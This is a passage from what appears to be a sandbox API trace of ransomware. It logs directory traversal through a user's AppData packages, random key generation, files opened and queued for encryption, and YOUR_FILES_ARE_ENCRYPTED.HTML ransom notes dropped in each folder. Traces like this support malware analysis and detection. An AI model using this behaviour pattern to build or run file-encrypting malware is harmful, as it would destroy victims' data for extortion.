dwReserved0=0x631228, dwReserved1=0x631188, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0117.402] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.402] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 101 [0117.402] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0117.402] lstrlenW (lpString=".lock") returned 5 [0117.403] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0117.403] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbc8273, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dbc8273, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0117.403] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.403] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\settings.dat") returned 101 [0117.403] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0117.403] lstrlenW (lpString=".dat") returned 4 [0117.403] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0117.403] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0117.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0117.403] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0117.403] GetProcessHeap () returned 0x600000 [0117.403] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0117.406] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="8E") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="5D") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="55") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="93") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="4E") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="A1") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="27") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C5") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="73") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="E1") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="5C") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="14") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="0C") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="FC") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="E5") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="88") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="B7") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="D4") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="5D") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="AD") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="63") returned 2 [0117.406] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="74") returned 2 [0117.406] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="87") returned 2 [0117.407] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="2A") returned 2 [0117.407] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="9B") returned 2 [0117.407] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="BD") returned 2 [0117.407] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="F0") returned 2 [0117.407] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="D0") returned 2 [0117.407] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="48") returned 2 [0117.407] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="90") returned 2 [0117.407] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="80") returned 2 [0117.407] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="65") returned 2 [0117.407] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\settings.dat" [0117.407] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0117.407] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0117.407] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbc8273, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dbc8273, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0117.407] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0117.408] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0117.408] GetProcessHeap () returned 0x600000 [0117.408] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.408] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.409] CloseHandle (hObject=0x320) returned 1 [0117.409] GetProcessHeap () returned 0x600000 [0117.410] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.410] GetProcessHeap () returned 0x600000 [0117.410] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.410] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dbc8273, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dbc8273, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dbc8273, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0117.410] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.410] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\SystemAppData") returned 93 [0117.410] GetProcessHeap () returned 0x600000 [0117.410] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.410] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\SystemAppData" [0117.410] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\SystemAppData\\*" [0117.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dbc8273, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dbc8273, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dbc8273, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626638 [0117.410] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dbc8273, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dbc8273, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dbc8273, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.410] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dbc8273, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dbc8273, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dbc8273, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0117.410] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0117.410] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0117.410] GetProcessHeap () returned 0x600000 [0117.410] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.411] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.412] CloseHandle (hObject=0x320) returned 1 [0117.412] GetProcessHeap () returned 0x600000 [0117.412] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.412] GetProcessHeap () returned 0x600000 [0117.412] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.412] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dae33de, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dae33de, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dae33de, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0117.412] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.412] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\TempState") returned 89 [0117.412] GetProcessHeap () returned 0x600000 [0117.412] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.412] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\TempState" [0117.412] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\TempState\\*" [0117.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dae33de, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dae33de, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dae33de, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626638 [0117.412] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dae33de, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dae33de, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dae33de, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.412] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dae33de, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dae33de, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dae33de, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0117.412] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0117.412] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0117.412] GetProcessHeap () returned 0x600000 [0117.412] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.413] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.414] CloseHandle (hObject=0x320) returned 1 [0117.414] GetProcessHeap () returned 0x600000 [0117.414] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.414] GetProcessHeap () returned 0x600000 [0117.414] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.414] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dae33de, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dae33de, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dae33de, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0117.414] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0117.414] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0117.414] GetProcessHeap () returned 0x600000 [0117.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0117.415] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0117.416] CloseHandle (hObject=0x31c) returned 1 [0117.416] GetProcessHeap () returned 0x600000 [0117.416] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.416] GetProcessHeap () returned 0x600000 [0117.416] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0117.418] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8793e8f, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.SkypeApp_kzf8qxf38zg5c", cAlternateFileName="MICROS~1.SKY")) returned 1 [0117.418] StrStrIW (lpFirst="Microsoft.SkypeApp_kzf8qxf38zg5c", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.418] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c") returned 81 [0117.418] GetProcessHeap () returned 0x600000 [0117.418] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x698498 [0117.419] lstrcpyW (in: lpString1=0x698498, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c" [0117.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\*" [0117.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8793e8f, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626978 [0117.534] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8793e8f, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0117.534] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf8341a01, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8341a01, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8341a01, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0117.534] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.534] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC") returned 84 [0117.534] GetProcessHeap () returned 0x600000 [0117.534] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.535] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC" [0117.535] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\AC\\*" [0117.535] FindFirstFileW (in: 